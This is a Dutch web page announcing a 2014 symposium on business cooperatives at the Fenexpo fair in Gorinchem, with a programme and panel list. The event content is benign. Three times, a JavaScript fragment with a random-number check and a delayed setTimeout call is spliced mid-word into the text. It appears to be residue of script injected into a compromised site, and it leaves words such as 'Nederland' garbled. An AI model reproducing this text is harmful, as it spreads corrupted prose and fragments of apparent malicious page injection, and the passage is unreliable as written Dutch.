Facilitaire Coöperatie

Symposium de Facilitaire Coöperatie: nu samenwerken belangrijker dan ooit
Paneldiscussie met Verheij Integrale Groenzorg, Correct en Avelingen Groep
Op 16 april 2014 organiseert de Facilitaire Coöperatie een symposium op het gebied van zakelijk samenwerken tijdens de Fenexpo beurs in Gorinchem. Dit symposium zal volledig in het teken staan in het beantwoorden van de vraag waarom zakelijk samenwerken zo belangrijk is. Zakelijk samenwerken kan in de vorm van een coöperatie. De facilitaire coöperatie wil kennis delen en organiseert daarom dit symposium over deze samenwerkingsvorm.
Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and heeft een groot aantal coöperaties. Sterker nog, je kunt zeggen dat coöperaties Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and hebben groot gemaakt. In dit symposium wordt duidelijk hoe deze ontwikkeling is gegaan, en welke factoren hebben bijgedragen aan dit succes. Coöperaties zijn relatief onbekend. Een interessante vraag is dan ook of en hoe deze bedrijven de PR-slag kunnen maken die beursgenoteerde bedrijven wel realiseren.
Tijdens het symposium zal Prof. Dr. Ir. Gert van Dijk een inleiding verzorgen. Van Dijk is Professor Cooperative Business op Nyenrode Business en is een autoriteit op het gebied van zakelijke samenwerking. Hij neemt luisteraars mee in een boeiend betoog over samenwerken in coöperaties. Hij geeft praktische adviezen voor startende coöperaties en gaat in op valkuilen en succesfactoren. Daarnaast gaat hij in op het bestaansrecht van een coöperatie, te weten: dienstverlening van het hoogste niveau. Van Dijk reikt enkele handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andvatten aan zodat bedrijven dit commercieel kunnen inzetten om huidige klanten te binden en potentiële klanten hiervan te overtuigen. Vervolgens vindt er een paneldiscussie plaats. Panelleden zijn: Wilco Boender, Commercieel Manager bij Verheij Integrale Groenzorg, Jan van Helden Algemeen Directeur bij Correct Groep en Gerda Derksen, Algemeen Directeur
Avelingen Groep.
Het symposium vindt plaats tijdens de Fenexpo beurs. Dit jaarlijks terugkerend evenement wordt georganiseerd in de Evenementenhal, Franklinweg 2 in Gorinchem. Het programma start om 15:30 uur. Inloop vanaf 15:00 uur. Belangstellenden kunnen zich gratis inschrijven via www.facilitaire-cooperatie.nl.
Programma
15:00: Ontvangst
15:30: Lezing Facilitaire Coöperatie Prof. Dr. Ir. Gert van Dijk
16:15: Paneldiscussie met medewerking van: Prof. Dr. Ir. Gert van Dijk, dhr. Wilco Boender (Commercieel Manager Verheij Integrale groenzorg) en dhr. Jan van Helden (Algemeen Directeur Correct Groep) en mevr. Gerda Derksen (Algemeen Directeur Avelingen Groep)
17:00: Afsluitende Borrel